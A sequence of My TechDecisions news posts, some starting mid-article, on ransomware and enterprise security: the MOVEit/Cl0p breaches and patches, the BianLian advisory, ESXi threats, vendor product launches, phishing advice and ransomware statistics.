The Crisis of Convergence: OT/ICS Cybersecurity 2023, which is available for free download, “details diverse intensifying challenges, including growth in attacks via Ransomware-as-a-Service (RaaS) models, exploitation of supply chain vulnerabilities and prevalence of state-sponsored hackers and other politically motivated actors in the wake of geopolitical issues,” according to the company announcement.

TXOne Networks surveyed 405 key information technology (IT) and operational technology (OT) security decision-makers from across multiple global markets and sectors including automotive, pharmaceuticals and biotechnology, chemical, general manufacturing, oil and gas and transportation in September 2023.

The Crisis of Convergence: OT/ICS Cybersecurity 2023 “distills the survey findings, alongside extensive TXOne Networks threat research from 545 cybersecurity incidents around the world in 2023,” according to the company announcement.

“The threat landscape has intensified significantly in the industrial manufacturing and critical infrastructure sectors, leading to destructive events, economic losses, and potential risks to human safety,” reads the TXOne Networks report, which was produced in collaboration with Frost & Sullivan.

“Organizations emphasize the protection of critical OT assets as a top priority, with data security being a key investment area within their OT security budget allocations,” the report says. “Organizations are also seeking to invest in strengthening the resilience of their technological infrastructure and are turning to innovative approaches like Cyber-Physical Systems Detection and Response (CPSDR), which integrates OT expertise across various domains.

“This enhances OT security posture and resilience against evolving threats, enabling organizations to better protect their operations and ensure resilience in the face of a constantly changing threat environment,” according to the report.

More About the TXOne Networks Cybersecurity Report

The Crisis of Convergence: OT/ICS Cybersecurity 2023 explores a range of topics relevant to contemporary OT/ICS cybersecurity:

• Ransomware threats
• OT system maintenance and Information Technology (IT) integration concerns
• Nation-state cyberattacks and implications
• Dedicated teams for OT and Industrial Control System (ICS) security management
• OT/ICS cybersecurity investment
• New regulations and standards propelling OT/ICS defense
• Supply-chain Integrity

“The Crisis of Convergence: OT/ICS Cybersecurity 2023 is the result of a thorough research and technical analysis that is aimed at delivering up-to-date insights into the global threat landscape and the tactics that malicious actors employ to launch attacks,” says Terence Liu, chief executive officer (CEO) of TXOne Networks, in the announcement.

“The findings are clear,” he says. “Organizations must move well beyond regulatory compliance in their OT/ICS cybersecurity strategies if they are to successfully adapt for the constantly evolving threat.

“Safeguarding the availability, reliability and security of revenue-generating operations will depend on new governance structures, enhanced team and technical capabilities, integration of advanced threat detection and response into cybersecurity frameworks and risk management across the supply chain,” says Liu.

Another version of this article originally appeared on our sister-site Security Sales & Integration on February 16, 2024. It has since been updated for My TechDecisions’ audience.

The post Rising Ransomware, Supply Chain Disruptions & Geopolitical Issues Complicate Cybersecurity appeared first on My TechDecisions.

A breach notification letter filed with the Office of the California Attorney General said the Cl0p ransomware gang gained access to its MOVEit managed file transfer (MFT) server on May 30 and stole files containing personally identifiable information (PII).

Clearinghouse is a nonprofit that provides educational reporting, data exchange, verification, and research services to approximately 22,000 high schools and 3,600 colleges and universities, which make up roughly 97% of students in public and private institutions, according to Bleeping Computer.

“On May 31, 2023, the Clearinghouse was informed by our third-party software provider, Progress Software, of a cybersecurity issue involving the provider’s MOVEit Transfer solution,” NSC wrote in the letter. “After learning of the issue, we promptly initiated an investigation with the support of leading cybersecurity experts. We have also coordinated with law enforcement.”

The stolen PII contained names, birth dates, contact information, Social Security numbers, student ID numbers and other school-related records. NSC said it has implemented patches to the MOVEit software and additional monitoring measures to further protect its systems and customers’ data. It is also offering identity monitoring services at no cost for two years.

In late May, the Cl0p ransomware gang began exploiting an SQL injection vulnerability in the MOVEit Transfer platform, leveraging a zero-day security flaw and gaining access to an underlying database, reports Help Net Security. Starting June 15, the cybercriminals started extorting organizations that fell victim to the attacks, exposing names on its dark web data leak site.

In late June, NSC notified the impacted schools about the breach but did not provide many details as the investigation was ongoing. At that time, Databreachnet.com reported that NCS’s name had been removed from Cl0p’s leak site, “which is often an indication that a victim paid.”

The breach has affected many organizations across the globe, including governments, financial institutions, pension systems, and other public and private entities. Among the victims are multiple U.S. federal agencies and two U.S. Department of Energy entities.

Coveware, a cyber extortion incident response firm, estimates the gang will collect around $75-100 million in payment due to high ransom requests.

Another version of this article originally appeared on our sister-site Campus Safety on September 25, 2023. It has since been updated for My TechDecisions’ audience.

The post Nearly 900 Schools Impacted by National Student Clearinghouse Data Breach appeared first on My TechDecisions.

The company’s update comes amid reports of widespread exploitation, including several at several U.S. agencies that were breached as part of the attack. Cybersecurity researchers say ransomware groups have seized upon the vulnerability and are using it to exfiltrate data to compel victim organizations to pay the ransom.

In the advisory, dated June 16, Progress says it has discovered vulnerability in MOVEit Transfer that could lead to escalated privileges and potential unauthorized access to the environment.

“If you are a MOVEit Transfer customer, it is extremely important that you take immediate action as noted below in order to help protect your MOVEit Transfer environment,” the company says in the new advisory. “In Progress MOVEit Transfer versions released before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an un-authenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint which could result in modification and disclosure of MOVEit database content.”

The incident, which was first identified in late May, now stretches well into June as organizations rush to patch their systems and protect their environment.

According to Progress Software, “All MOVEit Transfer customers must take action and apply the patch to address the June 15th CVE-2023-35708 vulnerability discovered in MOVEit Transfer. “

However, organizations have two paths to take, depending on if they applied the remediation and patching steps from the first MOVEit Transfer Critical Vulnerability (May 2023) advisory prior to June 15.

For those who have not yet applied the May 2023 patch, they should do so and follow the remediation steps immediately, the company says. This includes the newest patch for two separate vulnerabilities, including the original from May 31 (CVE-2023-34362) and another identified on June 9 (CVE-2023-35036).

Once that is taken care of, organizations should apply the June 15 patch (CVE-2023-35708).

If organizations have applied the May 31 and June 9 patch, they should now apply the June 15 patch, which will bring them fully up to date.

There is a lot of information coming out about these bugs, but cybersecurity firm Rapid7 has a detailed timeline of events, up until this new information.

May 27-28: Rapid7 services teams have so far confirmed indicators of compromise and data exfiltration dating back to at least May 27 and May 28, 2023 (respectively).

May 31: Progress Software publishes an advisory on a critical SQL injection vulnerability in their MOVEit Transfer solution.

May 31: Rapid7 begins investigating exploitation of MOVEit Transfer.

June 1: Rapid7 publishes initial analysis of MOVEit Transfer attacks after responding to incidents across multiple customer environments.

June 1: The security community publishes technical details and indicators of compromise.

June 1: Compromises continue; Rapid7 responds to alerts.

June 1: CISA publishes Security Advisory.

June 2: CVE-2023-34362is assigned to the zero-day vulnerability.

June 2: Mandiant attributes the attack to a threat cluster with unknown motives.

June 2: Velociraptor releases an artifact to detect exploitation of MOVEit File Transfer critical vulnerability.

June 4: Rapid7 publishes a method to identify which data was stolen.

June 4: Nova Scotian government discloses it is investigating privacy breach.

June 5: Microsoft attributes the attack to Lace Tempest, a Cl0p ransomware affiliate that has previously exploited vulnerabilities in other file transfer solutions (e.g., Accellion FTA, Fortra GoAnywhere MFT).

June 5: UK companies BA, BBC, and Boots disclose breaches as victims in MOVEit File Transfer.

June 5: Cl0p ransomware group claims responsibility for the zero-day attack.

June 6: Security firm Huntress releases a video allegedly reproducing the exploit chain.

June 6: The Cl0p ransomware group posts a communication on their leak site demanding that victim organizations contact them by June 14 to negotiate extortion fees in exchange for the deletion of stolen data.

June 7: CISA publishes #StopRansomware Cybersecurity Advisory regarding MOVEit File Transfer Vulnerability CVE-2023-34362.

June 9: Progress Software updates advisory to include a patch for a second MOVEit Transfer Vulnerability, which was uncovered by Huntress during a third-party code review. The vulnerability is later assigned CVE-2023-35036.

June 12: Rapid7 releases a full exploit chain for MOVEit Transfer Vulnerability CVE-2023-34362.

Organizations impacted should consult Progress Software, their cybersecurity services provider, and CISA for more information.

The post Progress Software Urges Further Action to Prevent MOVEit Exploitation appeared first on My TechDecisions.

According to the company, Zerto 10 offers a new replication architecture for scale-out efficiency and native protection of Azure Virtual Machines. In addition, it provides new support for multi-disk consistency for VMs in Microsoft Azure to help protect data both to and from Azure as well as across Azure regions within the cloud, the company says.

The company says Zerto 10 coordinates replication across all the virtual disks associated with a virtual machine in Azure to maintain data consistency for failover and recovery. The new cloud-based architecture is designed to enable easier scale out to “thousands of VMs,” reduce management complexity and enable data movers to scale out or back based on I/O levels between production and disaster recovery to, from or within Azure.

Specifically, Zerto 10 includes a new tool for ransomware resilience and real-time detection of encryption, which  monitors and reports on encryption as data streams in and can detect anomalous activity “within minutes” to alert users of suspicious activity.

According to the company, a new Zerto Cyber Resilience Vault is an air-gapped recovery vault designed to bring another layer of security with a real-time early warning system built on three pillars: replicate and detect, isolate and lock, and test and recover.

According to Zerto, combined with the vault’s zero trust architecture, the pillars enable rapid air-gapped recovery in a highly secure environment, allowing enterprises to architect and customize a recover vault to help mitigate ransomware attacks.

Zerto 10 also offers the new Linux-based Zerto Virtual Manager Appliance, a new tool that replaces the legacy Windows-based Virtual Manager designed to be easier to deploy, secure and maintain as part of regular Zerto product updates. Upgrading from legacy ZVMs will have their existing settings be migrated to the new appliance, the company says.

Zerto for Microsoft Azure will be available in the Azure Marketplace in July.

The post Zerto Launches Zerto 10 for Enhanced Disaster Recovery, Ransomware Mitigation appeared first on My TechDecisions.

According to a joint advisory from CISA, its Australian counterpart agency, the FBI, and input from Microsoft and Sophos, the BianLian group is a ransomware developer, deployer and data extortion group that has been active since June 2022. The group originally used a double-extortion model in which they encrypted systems after exfiltrating the data, but the BianLian group since January has shifted to largely exfiltration-based extortion, meaning they bypass encryption and use the threat of leaking sensitive data to compel victims to pay the ransom.

How the BianLian Ransomware group gains initial access and evades detection

According to the advisory, the group leverages legitimate IT tools to gain access and steal data, including Remote Desktop Protocol credentials, open-source tools and command-line scripting for discovery and credential harvesting, and data exfiltration via File Transfer Protocol (FTP), Rclone or Mega.

However, initial access is gained by leveraging compromised Remote Desktop Protocol credentials, which officials say are likely acquired from initial access brokers or phishing.

To evade detection, the BianLian ransomware group uses PowerShell and Windows Command Shell to disable antivirus tools, specifically Windows Defender and Anti-Malware Scan Interface. In addition, the group modifies the Windows Registry to disable tamper protection for Sophos SAVEnabled, SEDEnabled, and SAVService services, enabling them to uninstall those services.

How the BianLian Ransomware group learns about the victim’s environment

For discovery and learning about the victim’s environment, the BianLian group actors employ a variety of tools, including native Windows tools and Windows Command Shell get an overview of the victim’s environment.

To scan the network for open ports and ping computers, the group uses Advanced Port Scanner and SoftPerfect Network Scanner.

The group also uses SharpShares to enumerate accessible network shares in a domain and PingCastle to enumerate Active Directory and provide a map to visualize the hierarchy of trust relationships, according to the advisory.

Meanwhile, native Windows tools and Windows Command Shell are used to query logged-in users and query the domain to identify all groups, accounts in the Domain Admins and Domain Computers groups, and all users in the domain. In addition, the tools are used to retrieve a list of all domain controllers and domain trusts and identify accessible devices on the network, according to the advisory.

Read Next: Creating a Ransomware Response Plan

How BianLian Ransomware group obtains credentials and moves laterally

To more laterally through the network and conduct further malicious activities, the BianLian group uses valid accounts, the credentials of which are obtained in several ways, including using Windows Command Shell to find unsecured credentials on the local machine, harvesting credentials from the Local Security Authority Subsystem Services (LSASS) memory, using RDP Recognizer to brute force RDP passwords for check for vulnerabilities, and accessing the Active Directory domain database.

In one case, BianLian ransomware actors were observed using a portable executable version of an Impacket tool to move laterally to a domain controller and harvest credential hashes, authorities say.

Through Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network. This allows threat actors to run portable executable files on victim systems using local user rights, but only if the executable is not blocked.

BianLian group actors use PsExec and RDP with valid accounts for lateral movement, the advisory states. Prior to using RDP, BianLian actors used Command Shell and native Windows tools to add user accounts to the local Remote Desktop Users group, modified the added account’s password, and modified Windows firewall rules to allow incoming RDP traffic.

In one case, FBI found a forensic artifact (exp.exe) on a compromised system that likely exploits the Netlogon vulnerability (CVE-2020-1472) and connects to a domain controller, authorities say.

BianLian Ransomware group’s collection and exploitation

According to the advisory, the BianLian ransomware group has been observed using malware that enumerates registry and files and copies clipboard data from users.

The group searches for sensitive files using PowerShell scripts and exfiltrates them for data extortion, which is a departure from the group’s previous activity of encrypting files before extortion attempts.

BianLian group users FTP and Rclone, a tool used to sync files to cloud storage, to exfiltrate data. The group has been observed installing Rclone and other files in generic and generally unchecked folders, as well as using the Mega file sharing services to exfiltrate victim data.

According to a ransom note, BianLian group specifically looks for financial, client, business technical and personal files.

If a victim refuses to pay, the group threatens to publish exfiltrated data to a leak website on the Tor network. The ransom note directs victims to a Tox ID and a Tox chat or email address to communicate with the attackers.

The group communicates in a variety of ways, including printing a ransom note to printers on the compromised network.

How to Protect Against a BianLian Ransomware attack

In addition to typical ransomware mitigations, organizations are urged to limit the use of RDP and other remote desktop services, disable command-line and scripting activities and permissions, and restrict the usage of PowerShell and update Windows PowerShell or PowerShell Core to the latest version.

Read the advisory for more information, including the full list of recommendations and indicators of compromise.

The post BianLian Ransomware Group Skips Encryption and Goes Straight to Exfiltration appeared first on My TechDecisions.

According to the cybersecurity giant, these tools are specifically designed to affect VMware’s ESXi vSphere hypervisor. The company’s research into these kind of attacks date back to February 2021, when CrowdStrike began what is now a three-part blog series looking into this trend, which it says is continuing so far in 2023.

The company says RaaS platforms such as Alphv, Lockbit and Defray are being leveraged in attacks against ESXi, which CrowdStrike says does not support third-party agents or antivirus software.

“This, combined with the popularity of ESXi as a widespread and popular virtualization and management system, makes the hypervisor a highly attractive target for modern adversaries,” write CrowdStrike researchers in a new blog.

These attacks on ESXi servers have even led to the U.S. Cybersecurity and Infrastructure Agency issuing several warnings and releasing in February a recovery guide and script designed to help organizations recover from the ESXiArgs ransomware attacks.

CrowdStrike cites several vulnerabilities that have been exploited in the wild in the last few years, including:

• CVE-2020-3992 – an ESXi OpenSLP remote code execution vulnerability resulting form a user-after-free issue.
• CVE-2021-21974 – an ESXi OpenSLP heap-overflow vulnerability that could result in remote code execution.
• CVE-2019-5544 – an ESXi OpenSLP heap overwrite vulnerability.
• CVE-2021-44228 (Log4Shell) – a remote code execution vulnerability in Log4J that has been used to compromise VMware Horizon instances
• CVE-2016-7463, CVE-2017-4940 and CVE-2020-3955 – cross site scripting vulnerabilities used for privilege escalation.
• CVE-2021-22043  – privilege escalation vulnerability

New threats against VMware ESXi security

Due to VMWare’s prominence in IT infrastructure, ESXi servers remain an attractive target, with an increasing amount of threat actors leveraging these vulnerabilities in their attacks. Just recently, CrowdStrike has identified a new RaaS program that provides affiliates with ransomware binaries targeting Windows and ESXi/Linux systems, researchers write.

In addition, CrowdStrike and other researchers have identified many other new hacking groups and attack methods targeting ESXI over the past few years, as targeting virtual infrastructure gives attacks many advantages, including multiplying the impact of a single compromise or subverting detection and prevention mechanisms, as targeted components are often not sufficiently protected by security solutions.

“Because VMware products have been subject to critical vulnerabilities in the past, adversaries will likely continue to target any potential weaknesses, as successful compromises typically provide access to high-value resources,” CrowdStrike researchers write.

CrowdStrike says organizations should be aware of two main attack vectors when it comes to VMware ESXi servers: credential theft and virtual machine access.

Researchers call credential theft the “most straightforward attack vector against an ESXi hypervisor.” Following credential theft, an adversary can simply authenticate against the server to advance the attack based on their goal. With sufficient privileges to enable and access the SSH console, attackers can execute arbitrary code directly, even on the most recent ESXi versions.

If a VM can be accessed directly, CrowdStrike says poor segregation from the rest of the internal network can lead the VM facilitating lateral movement, which gives attackers more flexibility to choose a vulnerable system. A properly segregated VM, however, will require an attacker to directly target the ESXi hypervisor to run code at the hypervisor level and perform a VM escape exploit. However, this is a complicated process and most adversaries don’t have the capabilities to do so, researchers say.

How to secure VMware ESXi

To protect VMware hypervisors, CrowdStrike urges organizations to:

• Avoid direct access to ESXi hosts. It is recommended to use the vSphere Client to administer ESXi hosts managed by a vCenter Server. Direct access to managed hosts using the VMware Host Client or changing hosts from the Direct Console User Interface (DCUI) should be avoided.
• Use a hardened jump server with multifactor authentication (MFA). If direct access to an ESXi host is necessary, it should be limited to a jump server with MFA enabled. The jump server should be dedicated to administrative or privileged purposes, have full auditing capabilities, and restrict SSH, Web UI, and API access to ESXi or vCenter only from the jump server. SSH access should be disabled, and any attempt to enable it should trigger alerts and be investigated urgently.
• Not expose vCenter to the internet over SSH or HTTP. Adversaries have been observed gaining access to vCenter by exploiting vulnerabilities or using valid accounts. To mitigate this risk, vCenter services should not be exposed to the internet.
• Regularly back up ESXi datastore volumes. It is essential to back up virtual machine disk images and snapshots stored in ESXi datastores on a daily basis, or more frequently if possible. Backups should be stored offsite to enable system restoration during a ransomware event, while ensuring the backups themselves are not compromised.
• Consider physical disconnection of storage or power to ESXi host during encryption. In situations where encryption is suspected or known to be in progress and access to kill malicious processes is not possible, physically disconnecting the storage from the ESXi host or cutting power to the host can be an option. This can prevent ransomware from continuing to encrypt virtual machine disk files (VMDKs). Shutting down guest VMs will not help as the encryption occurs on the hypervisor itself. However, it’s important to note that physical disconnection may cause potential issues or data loss if data has not been written to backend storage.

Read VMware’s ESXi security recommendations to learn more.

The post CrowdStrike: VMware ESXi in the RaaS Crosshairs appeared first on My TechDecisions.

According to the company, the new innovations further enhance its threat and information protection platforms, in addition to its newly formed Identity Threat Defense business (formerly known as Illusive), to help organizations augment and safeguard their productivity investments, such as Microsoft 365, with maximum deployment flexibility.

“Proofpoint continues to deliver on innovations that empower organizations to break the attack chain,” said Ryan Kalember, executive vice president, cyber security strategy, Proofpoint in a statement. “By providing our customers a unified path to solve for risk across email, cloud, identity and data, CISOs gain unparalleled visibility into and protection against the tactics that attackers rely on most.”

Proofpoint’s Aegis Threat Protection Platform

Proofpoint Aegis Threat Protection Platform is an AI/ML-powered threat protection platform that disarms attacks, such as business email compromise (BEC), phishing, ransomware, supply chain threats. With flexible deployment options using both APIs and inline architecture, Aegis delivers AI-powered, cloud-based protection that complements native Microsoft 365 defenses, says Proofpoint.

By combining the company’s proprietary behavioral analytics and threat intelligence, Proofpoint is delivering new capabilities that provide visibility into account takeover-based attacks from both within an organization’s environment and outside suppliers.

Supplier Threat Protection

Supplier relationships are a growing attack vector: 69% of organizations experienced a supply chain attack within the past year, and CISOs rate it as one of their top concerns, according to Proofpoint research. With Proofpoint’s Supplier Threat Protection, organizations can detect compromised supplier accounts so that security teams can swiftly investigate and remediate.

This new product proactively monitors for and prioritizes known compromised third-party accounts, simplifies investigation with details on why the account is suspected compromised and which employees recently communicated with the account in question, enabling security teams to seamlessly defend against prevalent third-party attacks such as BEC and phishing.

Targeted Attack Prevention Account Takeover (TAP ATO)

Threat actors successfully override MFA in 30% of all targeted cloud and email account takeover attacks according to Proofpoint threat research. Once inside, malicious actors can hide undetected in an organization’s environment, waging sophisticated attacks at will.

Proofpoint TAP ATO, available at the end of Q2 2023, provides visibility across the entire email account takeover attack chain. It accelerates response investigation and remediates accounts, malicious mailbox rule changes, and manipulations of third-party apps and data exfiltration across email and cloud environments.

Identity Threat Defense (formerly known as Illusive)

From ransomware to APTs, 90% of attacks rely on compromised identities, says Proofpoint. The complexity of managing Active Directory (AD) has resulted in the presence of exploitable privileged identity risks in all organizations at a rate of one in six endpoints.

These identity risks include unmanaged local admins with stale passwords, misconfigured users with unnecessary privileges, cached credentials left exposed on endpoints and much more. When an attacker compromises an endpoint with these privileged identity risks, deploying malicious software and stealing data is easy. Privileged identities represent the keys to the kingdom, which attackers exploit to steal the crown jewels. Unfortunately, most organizations are unaware of this risk – until they are attacked.

Leveraging new advanced identity risk analytics and automated detection, Proofpoint has further bolstered its Identity Threat Defense platform – undefeated in more than 150 red team exercises – to provide organizations with comprehensive identity risk protection and remediation:

 Spotlight Risk Analytics

The new advanced risk analytics in the Spotlight dashboard allows users to gain an executive view of an organization’s risk trends as well as exposure across various risk categories and risk exposure levels. It also provides recommendations for possible user admin action.

Spotlight Risk Analytics simplifies decision makers’ workload while ensuring organizational leaders can make informed decisions to remediate modern and sophisticated identity risks. With availability expected late Q2 2023, decision makers will also be able to follow risk trends to track their organization’s risk posture improvements over time.

Proofpoint Spotlight Cross Domain & Trust Visibility

For organizations with complex infrastructure, including multinational, multi-business and merging organizations, identity infrastructure is often stitched together without broader visibility.

Spotlight Cross Domain & Trust Visibility provides insight to understand where AD domains across companies have too much bi-directional trust, which can result in identity risk and lateral movement by attackers. Business leaders can gain a centralized view into the broadest organizational structure’s domains and trusts to better prevent identity risk exposure in a holistic fashion.

Sigma Information Protection Platform

Since its introduction in early 2020, Proofpoint’s information protection business has grown a remarkable 107%, making the company the second largest data loss prevention (DLP) vendor globally and by revenue according to Gartner. Driven by the accelerated adoption of work-from-anywhere practices, the Proofpoint Sigma Information Protection platform is now deployed to over 5,000 customers and 46 million users worldwide, analyzing 45 billion events each month, and trusted by nearly half of the Fortune 100.

Proofpoint’s Information Protection platform merges content inspection, threat telemetry and user behavior across channels in a unified, cloud-native interface.

Privacy by Design Data Loss Prevention

As international organizations work to meet new and changing local privacy and data sovereignty requirements, Proofpoint now hosts its Sigma Information Protection platform in regions such as the European Union, Japan, and Australia in addition to the U.S.

Proofpoint is also further investing in privacy-related capabilities so that organizations can mask sensitive data in the console to limit its exposure and create custom data access policies to address privacy and compliance needs. 

Additional features are available in beta, with general availability expected in Q3 2023, enabling organizations to anonymize identifying user information so analysts can investigate without bias and with better privacy for the user.

Administrators will also be able to set up metadata for anonymization and approval workflows for de-anonymizing the metadata during investigation.

The post Proofpoint Unveils New Innovations to Combat Increasingly Common Threats appeared first on My TechDecisions.

Here are the following best practices for individuals and organizations to adopt to protect themselves from tax scams ahead of the the U.S. tax deadline from Steven Spadaccini, VP of Threat Intelligence at SafeGuard Cyber.

1. Be vigilant when receiving unsolicited emails or attachments and verify the sender’s identity before opening or downloading any files. Don’t click on links or open attachments in emails from unknown sources, and always double-check the sender’s email address and content for any signs of phishing attempts.
2. Enable macro-blocking in Microsoft Office to prevent macro-based attacks and keep software up to date to prevent exploits from taking advantage of known vulnerabilities. Many campaigns use malicious macros to deliver malware, so it’s crucial to block macros by default and only allow them in trusted documents.
3. Use reputable cybersecurity solutions that can detect and block Emotet and regularly backup important data to prevent data loss from ransomware attacks. Cybersecurity platforms like SafeGuard Cyber can detect and remove malware and other malicious software. Backing up your data ensures that you don’t lose important files in case of a ransomware attack.
4. Educate your employees on how to identify and report phishing attempts and other suspicious activity to your IT department or local authorities to help prevent future attacks. Regular security awareness training can go a long way in helping employees identify and avoid phishing attacks, suspicious emails and social engineering tactics.

As the tax season looms and security threats like Emotet malware and Tactical#Octopus are active, enterprises must be mindful of potential cybersecurity threats that can arise from workplaces with cloud-based communication tools like Telegram, Line or WhatsApp. SMS is particularly vulnerable to phishing scams for illicit monetary gain—making it only a matter of time before the next big breach becomes reality.

By adopting these best practices, individuals and organizations can stay protected from these tax scams. Remember that prevention is always better than cure, and investing in cybersecurity measures and training can go a long way in mitigating the risks associated with these threats.

Steven is a seasoned senior cyber executive with more than 20 years of experience working for some of the highest-profile cybersecurity and technology companies in the world. Prior to joining SafeGuard Cyber, Steven held senior VP leadership positions at Absolute, Trend Micro, Imperva, FireEye (Trellix), and DTEX Systems as well as several other cyber security startups.

The post Best Practices on How to Avoid Phishing Scams Ahead of Tax Day appeared first on My TechDecisions.

According to Microsoft, the company’s Digital Crimes Unit (DCU), Fortra and Health Information Sharing and Analysis Center (Health-ISAC) are taking both legal and technical action to disrupt the use of abused copies of Cobalt Strike and Microsoft software, which are favorite tools of ransomware groups.

This represents a new way of disrupting cybercrime, with a greater scope and more complex operation that doesn’t just disrupt the command and control infrastructure of malicious actors. Instead, Microsoft and Fortra are working to remove illegal, legacy copies of Cobalt Strike so they can no longer be used for malicious purposes.

Cobalt Strike, a brand owned by Fortra, is a legitimate and popular post-exploitation tool used for simulated attacks. However, older versions of the software have been abused and altered by hacking groups to launch attacks, including ransomware campaigns against the Government of Costa Rica and the Irish Health Service Executive.

Microsoft says the company’s software development kits and APIs are also abused as part of the coding of the malware as well as the criminal malware distribution infrastructure used to target and mislead the victims.

Amy Hogan-Burney, general manager of Microsoft’s DCU, writes in a blog that the ransomware families associated with or deployed by cracked copies of Cobalt Strike have been linked to more than 68 ransomware families impacting healthcare organizations.

The activity comes after Microsoft, Fortra and Health-ISAC obtained a court order form the U.S. District Court of the Eastern District of New York to disrupt the infrastructure, which includes notifying relevant internet service providers and computer emergency readiness teams to help severe the connection between operators and infected victim computers.

Investigation efforts between the companies included detection, analysis, telemetry and reverse engineering, with additional data and insights from partners to help strengthen the legal case. The actions focused only on disrupting cracked, legacy copies of Cobalt Strike and compromised Microsoft software, Hogan-Burney writes.

The company is also expanding a legal method used to disrupt malware and nation state operations to target the abuse of security tools used by a broad spectrum of hacking groups, which is hoped to significantly hinder the monetization of those tools and slow their use in attacks. This action is designed to force cybercriminals to change their tactics.

To that end, the action also included copyright claims against the malicious use of Microsoft and Fortra’s software code, which are altered for use by malicious actors.

Fortra is also taking steps to prevent the misuse of its software, including more stringent customer vetting, but criminals have historically stolen older versions of security software to create cracked copies to gain backdoor access into victim devices. Some infamous ransomware groups have been observed doing so, including Conti, LockBit and other groups involved in the ransomware-as-a-service model, according to Hogan-Burney.

However, ransomware groups and cybercriminals are notorious for regrouping and adopting new tactics, and they will likely do so again in this case.

“While this action will impact the criminals’ immediate operations, we fully anticipate they will attempt to revive their efforts,” Hogan-Burney writes. “Our action is therefore not one and done. Through ongoing legal and technical action, Microsoft, Fortra and Health-ISAC, along with our partners, will continue to monitor and take action to disrupt further criminal operations, including the use of cracked copies of Cobalt Strike.”

The post Microsoft, Fortra Take Action to Disrupt Ransomware Groups Targeting Healthcare appeared first on My TechDecisions.

As a whole, 2022 was a turbulent year for cybersecurity, with ransomware attacks at the forefront. Cybercriminals conducted a number of large-scale attacks that caused major financial losses. According to NordLocker research, 2,263 ransomware attacks were carried out in 2022, 896 in the U.S. alone; 128 attacks targeted businesses in the U.K., 96 in Germany, 90 in Canada, and 74 in Italy. Nearly 2,000 companies were affected worldwide.

April 2022 Record-Breaking Ransomware Incidents

Despite the ups and downs of cyber threats over the year, one month was especially harmful — 20 ransomware groups vigorously attacked 192 companies worldwide. Compared to the annual average (188 attacks per month), April was record-breaking with 294 ransomware incidents, says NordLocker. Through April of 2022, companies with 11-50 employees were the most affected by cybersecurity breaches, with 80% of cases coming from the private sector, according to NordLocker.

The manufacturing industry was hit the hardest with 26 cyberattacks in April alone. The finance and tech sectors were also heavily targeted, with 19 and 18 breaches respectively. Additionally, the construction, retail, education and energy sectors were affected by ransomware numerous times during the month.

Twenty ransomware groups were responsible for these attacks, and LockBit and Conti are the most active, responsible for 33.21% and 23.72% of attacks. In fact, these two Russian-linked gangs are specifically responsible for this peak — April was the month when Conti and LockBit carried most of their attacks per month in 2022.

Businesses can safeguard themselves

Companies that were slow to update their security measures suffered the most damage. At the same time, those who kept up with new developments in the industry were often able to avoid such attacks altogether. Cybersecurity experts predicted a further rise in ransomware in the coming years, though many businesses remain unprepared to face such threats.

With April being such a precarious month for ransomware attacks, it’s more important than ever for businesses to take steps to protect themselves from this growing threat.

“We are continuously encouraging companies to take actions and reduce their chances of becoming victims of cybercrime. In a ransomware attack, companies can find themselves in a challenging situation when faced with a ransomware demand — often having no choice but to pay up or lose access to their data forever,” says Darius Borisas, head of business development for NordLocker.

Taking into account that in February, one of the most notorious ransomware groups managed to hit the all time record of their attacks, April is expected to be a high-risk month.

Best Practices to Protect Businesses from Ransomware Attacks

Borisas explains that ransomware continues to be one of the biggest threats facing businesses today. Organizations must stay ahead of attackers by implementing effective security measures throughout the year — not just in April.

Borisas outlines four foundational cybersecurity best practices for businesses to employ:

• Back up and encrypt your files. File backup is a fundamental cybersecurity practice and worth the additional investment because, in the unfortunate case of an attack, you will always have a copy of your files, and the sudden loss won’t interfere with your business operations. However, the most important and confidential files should be encrypted so that no one can access them. Use an encrypted cloud for confidential data storage to avoid accidents and protect your files from prying eyes.

• Adopt zero-trust network access. Every access request to digital resources by a staff member should be granted only after their identity has been appropriately verified.

• Train your employees. Proper knowledge about the most common types of threats is one of the main cornerstones of organizational cybersecurity. Training your employees on how to identify and deal with threats can have a profound impact on your company’s cybersecurity.

• Keep your software up to date. Software updates  make the experience better, safer and more efficient and fix security loopholes that protect your data before hackers learn how to exploit those vulnerabilities.

The post Businesses Beware: April is the Most Dangerous Month for Ransomware Attacks appeared first on My TechDecisions.